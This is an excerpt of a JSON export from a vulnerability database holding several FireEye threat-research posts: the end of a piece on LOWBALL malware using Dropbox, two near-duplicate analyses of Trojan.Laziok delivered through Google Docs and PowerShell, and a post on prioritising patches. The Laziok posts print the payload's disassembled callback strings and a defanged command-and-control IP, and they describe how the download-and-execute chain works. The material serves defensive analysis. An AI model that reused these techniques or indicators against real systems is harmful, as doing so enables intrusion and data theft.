The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download):\n\n * upload.bat, a batch script that the compromised machine will execute\n * upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) which the batch script will run and almost always uploads the results of download.rar to the cloud storage account\n * silent.txt and period.txt, small files of 0-4 bytes in size that dictate the frequency to check in with the CnC\n\nThe threat actor then downloads the results and deletes the files from the cloud storage account.\n\n### Conclusion\n\nLOWBALL is an example of malware that abuses cloud storage services to mask its activity from network defenders. The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets.\n\n_A version of this article appeared first on the __FireEye Intelligence Center__. The FireEye Intelligence Center provides access to strategic intelligence, analysis tools, intelligence sharing capabilities, and institutional knowledge based on over 10 years of FireEye and Mandiant experience detecting, responding to and tracking advanced threats. FireEye uses a proprietary intelligence database, along with the expertise of our Threat Intelligence Analysts, to power the Intelligence Center._\n\n[1] FireEye currently tracks this activity as an \u201cuncategorized\u201d group, a cluster of related threat activity about which we lack information to classify with an advanced persistent threat number.\n\n[2] FireEye. Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic. <https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf>\n\n[3] FireEye. 
HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. \n\n[4] Moran, Ned and Alex Lanstein. FireEye. \u201cSpear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370.\u201d 25 March 2014. https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html.\n\n[5] Moran, Ned and Thoufique Haq. FireEye. \u201cKnow Your Enemy: Tracking a Rapidly Evolving APT Actor.\u201d 31 October 2013. FireEye. Poison Ivy: Assessing Damage and Extracting Intelligence.\n\n[6] BBC News. \u201cHong Kong student leaders charged over Umbrella Movement.\u201d 27 August 2015. http://www.bbc.com/news/world-asia-china-34070695.\n\n[7] Zhao, Shirley, Joyce Ng, and Gloria Chan. \u201cUniversity of Hong Kong\u2019s council votes 12-8 to reject Johannes Chan\u2019s appointment as pro-vice-chancellor.\u201d 30 September 2015. http://www.scmp.com/news/hong-kong/education-community/article/1862423/surprise-move-chair-university-hong-kong.\n\n[8] Wong, Alan. \u201cPro-Democracy Media Company\u2019s Websites Attacked.\u201d New York Times. 18 June 2014. http://sinosphere.blogs.nytimes.com/2014/06/18/pro-democracy-media-companys-websites-attacked/.\n\n[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EJ Insight. 31 August 2015. 
http://www.ejinsight.com/20150831-hku-concern-group-raises-proxy-fears-in-key-vote/.\n", "edition": 2, "cvss3": {}, "published": "2015-12-01T08:00:00", "type": "fireeye", "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2015-12-01T08:00:00", "id": "FIREEYE:840F71EB7FEBB100F9428F0841BEF2CF", "href": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:44", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. 
It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and exploits CVE-2014-6332, a memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation, through VBScript execution in Internet Explorer (versions 3 to 11), bypassing operating system security utilities and other protections and thus enabling attackers to enter the \u201cGodMode\u201d function. Exploitation of CVE-2014-6332 combined with GodMode privilege abuse has been seen since late 2014 via a known PoC[ii], as seen in Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside the path defined by the %APPDATA% environment variable via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. 
We have previously discussed [active PowerShell data stealing campaigns from Russia](<https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nThe above instructions from the unpacked payload highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. 
PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. \n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "cvss3": {}, "published": "2016-04-21T17:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2014-6332"], "modified": "2016-04-21T17:45:00", "id": "FIREEYE:E9E6074E1BE7D5905706DE1C69AFDCDE", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:19", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. 
We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs an exploit for CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections, thus enabling attackers to enter the \u201cGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen in Figures 2a and 2b:\n\n\n\nFigure 2a. CVE-2014-6332 usage\n\n\n\nFigure 2b. 
Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download the malware and execute it from the path defined by the %APPDATA% environment variable via the DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n\n\nFigure 3. 
Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII \"&INSTAL=\" \n0040681A MOV EDX,21279964.00414D3E ASCII \"&V=\" \n0040682F MOV EDX,21279964.00414E5D ASCII \"&Arch=\" \n00406872 MOV EDX,21279964.00414166 ASCII \"post.php\" \n00406899 MOV EDX,21279964.00414EB0 ASCII \"*0\"\n\nAbove instructions 
of the payload, when unpacked, highlight the typical traits of Trojan.Laziok. The infostealer tries to collect information about computer name, CPU details, RAM size, location (country), and installed software and antivirus (AV). Our MVX engine also shows that it attempts to access popular AV files, such as installer files for Kaspersky, McAfee, Symantec and Bitdefender. It also blends in by copying itself to well-known folders and processes such as:\n\nC:\\Documents and Settings\\admin\\Application Data\\System\\Oracle\\smss.exe\n\nThe payload attempts to call back to a known bad Polish server [hxxp://]193.189.117[.]36\n\nWe observed the first instance of this attack on March 13, 2016. The malware was available on Google Docs until we alerted Google about its presence. Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google\u2019s security checks. Following our notification, Google promptly removed the malicious file and it can no longer be fetched.\n\n##### **Conclusion**\n\nFireEye\u2019s multi-flow detection mechanism catches this at every level, from the point of entry to the callback \u2013 and the malware is not able to bypass FireEye sandbox security. PowerShell data stealing campaigns have also been observed spreading through document files with embedded macros, so corporate environments need to be extra careful regarding the policy and regulation of PowerShell usage \u2013 especially since the abuse can involve some trusted sources that sometimes have exemptions, with whitelists from some security vendors being one example. Or they can keep using FireEye. 
\n\n\n[i] http://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector \n[ii] http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/ \n[iii] https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html\n", "edition": 2, "cvss3": {}, "published": "2016-04-21T13:45:00", "type": "fireeye", "title": "PowerShell used for spreading Trojan.Laziok through Google Docs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332", "CVE-2012-0158"], "modified": "2016-04-21T13:45:00", "id": "FIREEYE:9242936BDC44C87F17F05E9388AC5EAC", "href": "https://www.fireeye.com/blog/threat-research/2016/04/powershell_used_for.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T16:41:57", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations._\n\nOrganizations often have to make difficult choices when it comes to patch prioritization. 
Many are faced with securing complex network infrastructure with thousands of systems, different operating systems, and disparate geographical locations. Even when armed with a simplified vulnerability rating system, it can be hard to know where to start. This problem is compounded by the ever-changing threat landscape and increased access to zero-days.\n\nAt FireEye, we apply the rich body of knowledge accumulated over years of global intelligence collection, incident response investigations, and device detections, to help our customers defend their networks. This understanding helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations. \n\nIn this blog post, we\u2019ll demonstrate how we apply intelligence to help organizations assess risk and make informed decisions about vulnerability management and patching in their environments.\n\n#### Functions of Vulnerability Intelligence\n\nVulnerability intelligence helps clients to protect their organizations, assets, and users in three main ways:\n\n \nFigure 1: Vulnerability intelligence can help with risk assessment and informed decision making\n\n#### Tailoring Vulnerability Prioritization\n\nWe believe it is important for organizations to build a defensive strategy that prioritizes the types of threats that are most likely to impact their environment, and the threats that could cause the most damage. When organizations have a clear picture of the spectrum of threat actors, malware families, campaigns, and tactics that are most relevant to their organization, they can make more nuanced prioritization decisions when those threats are linked to exploitation of vulnerabilities. 
A lower risk vulnerability that is actively being exploited in the wild against your organization or similar organizations likely has a greater potential impact to you than a vulnerability with a higher rating that is not actively being exploited.\n\n \nFigure 2: Patch Prioritization Philosophy\n\n#### Integration of Vulnerability Intelligence in Internal Workflows\n\nBased on our experience assisting organizations globally with enacting intelligence-led security, we outline three use cases for integrating vulnerability intelligence into internal workflows.\n\n \nFigure 3: Integration of vulnerability intelligence into internal workflows\n\n**Tools and Use Cases for Operationalizing Vulnerability Intelligence**\n\n_1\\. Automate Processes by Fusing Intelligence with Internal Data_\n\nAutomation is valuable to security teams with limited resources. Similar to automated detecting and blocking of indicator data, vulnerability threat intelligence can be automated by merging data from internal vulnerability scans with threat intelligence (via systems like the Mandiant [Intelligence API](<https://www.fireeye.com/solutions/cyber-threat-intelligence/threat-intelligence-subscriptions/intelligence-api.html>)) and aggregated into a SIEM, Threat Intelligence Platform, and/or ticketing system. This enhances visibility into various sources of both internal and external data with vulnerability intelligence providing risk ratings and indicating which vulnerabilities are being actively exploited. 
FireEye also offers a custom tool called FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d), described in more detail below for quickly correlating vulnerabilities found in logs and scans with Mandiant ratings.\n\nSecurity teams can similarly automate communication and workflow tracking processes using threat intelligence by defining rules for auto-generating tickets based on certain combinations of Mandiant risk and exploitation ratings; for example, internal service-level-agreements (SLAs) could state that \u2018high\u2019 risk vulnerabilities that have an exploitation rating of \u2018available,\u2019 \u2018confirmed,\u2019 or \u2018wide\u2019 must be patched within a set number of days. Of course, the SLA will depend on the company\u2019s operational needs, the capability of the team that is advising the patch process, and executive buy-in to the SLA process. Similarly, there may be an SLA defined for patching vulnerabilities that are of a certain age. Threat intelligence tells us that adversaries continue to use older vulnerabilities as long as they remain effective. For example, as recently as January 2020, we observed a Chinese cyber espionage group use an exploit for CVE-2012-0158, a Microsoft Office stack-based buffer overflow vulnerability originally released in 2012, in malicious email attachments to target organizations in Southeast Asia. Automating the vulnerability-scan-to-vulnerability-intelligence correlation process can help bring this type of issue to light. \n\nAnother potential use case employing automation would be incorporating vulnerability intelligence as security teams are testing updates or new hardware and software prior to introduction into the production environment. This could dramatically reduce the number of vulnerabilities that need to be patched in production and help prioritize those vulnerabilities that need to be patched first based on your organization\u2019s unique threat profile and business operations.\n\n_2\\. 
Communicating with Internal Stakeholders_\n\nTeams can leverage vulnerability reporting to send internal messaging, such as flash-style notifications, to alert other teams when Mandiant rates a vulnerability known to impact your systems high or critical. These are the vulnerabilities that should take priority in patching and should be patched outside of the regular cycle.\n\nData-informed intelligence analysis may help convince stakeholders outside of the security organization the importance of patching quickly, even when this is inconvenient to business operations. Threat Intelligence can inform an organization\u2019s appropriate use of resources for security given the potential business impact of security incidents.\n\n_3\\. Threat Modeling_\n\nOrganizations can leverage vulnerability threat intelligence to inform their threat modeling to gain insight into the most likely threats to their organization, and better prepare to address threats in the mid to long term. Knowledge of which adversaries pose the greatest threat to your organization, and then knowledge of which vulnerabilities those threat groups are exploiting in their operations, can enable your organization to build out security controls and monitoring based on those specific CVEs.\n\n#### Examples\n\nThe following examples illustrate workflows supported by vulnerability threat intelligence to demonstrate how organizations can operationalize threat intelligence in their existing security teams to automate processes and increase efficiency given limited resources.\n\n_Example 1: Using FIVE for Ad-hoc Vulnerability Prioritization_\n\nThe FireEye Intelligence Vulnerability Explorer (\u201cFIVE\u201d) tool is available for customers [here](<https://fireeye.market/apps?query=five>). 
It is available for MacOS and Windows, requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration.\n\n \nFigure 4: FIVE Tool for Windows and MacOS\n\nIn this scenario, an organization\u2019s intelligence team was asked to quickly identify any vulnerability that required patching from a server vulnerability scan after that server was rebuilt from a backup image. The intelligence team was presented with a text file containing a list of CVE numbers. Users can drag-and-drop a text readable file (CSV, TEXT, JSON, etc.) into the FIVE tool and the CVE numbers will be discovered from the file using regex. As shown in Figure 6 (below), in this example, the following vulnerabilities were found in the file and presented to the user. \n\n \nFigure 5: FIVE tool startup screen waiting for file input\n\n \nFigure 6: FIVE tool after successfully regexing the CVE-IDs from the file\n\nAfter selecting all CVE-IDs, the user clicked the \u201cFetch Vulnerabilities\u201d button, causing the application to make the necessary two-stage API call to the Intelligence API.\n\nThe output depicted in Figure 7 shows the user which vulnerabilities should be prioritized based on FireEye\u2019s risk and exploitation ratings. The red and maroon boxes indicate vulnerabilities that require attention, while the yellow indicate vulnerabilities that should be reviewed for possible action. Details of the vulnerabilities are displayed below, with associated intelligence report links providing further context.\n\n \nFigure 7: FIVE tool with meta-data, CVE-IDs, and links to related Intelligence Reports\n\nFIVE can also facilitate other use cases for vulnerability intelligence. 
For example, this chart can be attached in messaging to other internal stakeholders or executives for review, as part of a status update to provide visibility on the organization\u2019s vulnerability management program.\n\n_Example 2: Vulnerability Prioritization, Internal Communications, Threat Modeling_\n\nCVE-2019-19781 is a vulnerability affecting Citrix that Mandiant Threat Intelligence rated critical. Mandiant discussed early exploitation of this vulnerability in a January 2020 blog post. We continued to monitor for additional exploitation, and informed our clients when we observed exploitation by ransomware operators and the Chinese espionage group APT41.\n\nIn cases like these, threat intelligence can help impacted organizations find the \u201csignal\u201d in the \u201cnoise\u201d and prioritize patching using knowledge of exploitation and the motives and targeting patterns of threat actors behind the exploitation. Enterprises can use intelligence to inform internal stakeholders of the potential risk and provide context as to the potential business and financial impact of a ransomware infection or an intrusion by a highly resourced state sponsored group. This supports the immediate patch prioritization decision while simultaneously emphasizing the value of a holistically informed security organization.\n\n_Example 3: Intelligence Reduces Unnecessary Resource Expenditure \u2014 Automating Vulnerability Prioritization and Communications_\n\nAnother common application for vulnerability intelligence is informing security teams and stakeholders when to stand down. When a vulnerability is reported in the media, organizations often spin up resources to patch as quickly as possible. Leveraging threat intelligence in security processes helps an organization discern when it is necessary to respond in an all-hands-on-deck manner.\n\nTake the case of the [CVE-2019-12650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12650>), originally disclosed on Sept. 
25, 2019 with an NVD rating of \u201cHigh.\u201d Without further information, an organization relying on this score to determine prioritization may include this vulnerability in the same patch cycle along with numerous other vulnerabilities rated High or Critical. As previously discussed, our experts reviewed the vulnerability and determined that it required the highest level of privileges available to exploit successfully, and that there was no evidence of exploitation in the wild.\n\nThis is a case where threat intelligence reporting as well as automation can effectively minimize the need to unnecessarily spin up resources. Although the public NVD score rated this vulnerability high, Mandiant Intelligence rated it as \u201clow\u201d risk due to the high level of privileges needed to use it and lack of exploitation in the wild. Based on this assessment, organizations may decide that this vulnerability could be patched in the regular cycle and does not necessitate use of additional resources to patch out-of-band. When Mandiant ratings are automatically integrated into the patching ticket generation process, this can support efficient prioritization. Furthermore, an organization could use the analysis to issue an internal communication informing stakeholders of the reasoning behind lowering the prioritization.\n\n#### Vulnerabilities: Managed\n\nBecause we have been closely monitoring vulnerability exploitation trends for years, we were able to distinguish when attacker use of zero-days evolved from use by a select class of highly skilled attackers, to becoming accessible to less skilled groups with enough money to burn. Our observations consistently underscore the speed with which attackers exploit useful vulnerabilities, and the lack of exploitation for vulnerabilities that are hard to use or do not help attackers fulfill their objectives. 
Our understanding of the threat landscape helps us to discern between hundreds of newly disclosed vulnerabilities to provide ratings and assessments that empower network defenders to focus on the most significant threats and effectively mitigate risk to their organizations.\n\nMandiant Threat Intelligence enables organizations to implement a defense-in-depth approach to holistically mitigate risk by taking all feasible steps\u2014not just patching\u2014to prevent, detect, and stymie attackers at every stage of the attack lifecycle with both technology and human solutions.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n\n**Additional Resources**\n\nZero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill \u2014 Intelligence for Vulnerability Management, Part One\n\nThink Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two\n\nSeparating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities \u2014 Intelligence for Vulnerability Management, Part Three\n\nMandiant offers [Intelligence Capability Development (ICD) services](<https://www.fireeye.com/solutions/cyber-threat-intelligence.html>) to help organizations optimize their ability to consume, analyze and apply threat intelligence.\n\nThe [FIVE tool is available on the FireEye Market](<https://fireeye.market/apps?query=five>). It requires a valid subscription for Mandiant Vulnerability Intelligence, and is driven from an API integration. Please contact your Intelligence Enablement Manager or FireEye Support to obtain API keys. \n\nMandiant's OT Asset Vulnerability Assessment Service informs customers of relevant vulnerabilities by matching a customer's asset list against vulnerabilities and advisories. 
Relevant vulnerabilities and advisories are delivered in a report from as little as once a year, to as often as once a week. Additional add-on services such as asset inventory development and deep dive analysis of critical assets are available. Please contact your Intelligence Enablement Manager for more information.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-27T12:30:00", "type": "fireeye", "title": "Putting the Model to Work: Enabling Defenders With Vulnerability\nIntelligence \u2014 Intelligence for Vulnerability Management, Part Four", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12650", "CVE-2019-19781", "CVE-2012-0158"], "modified": 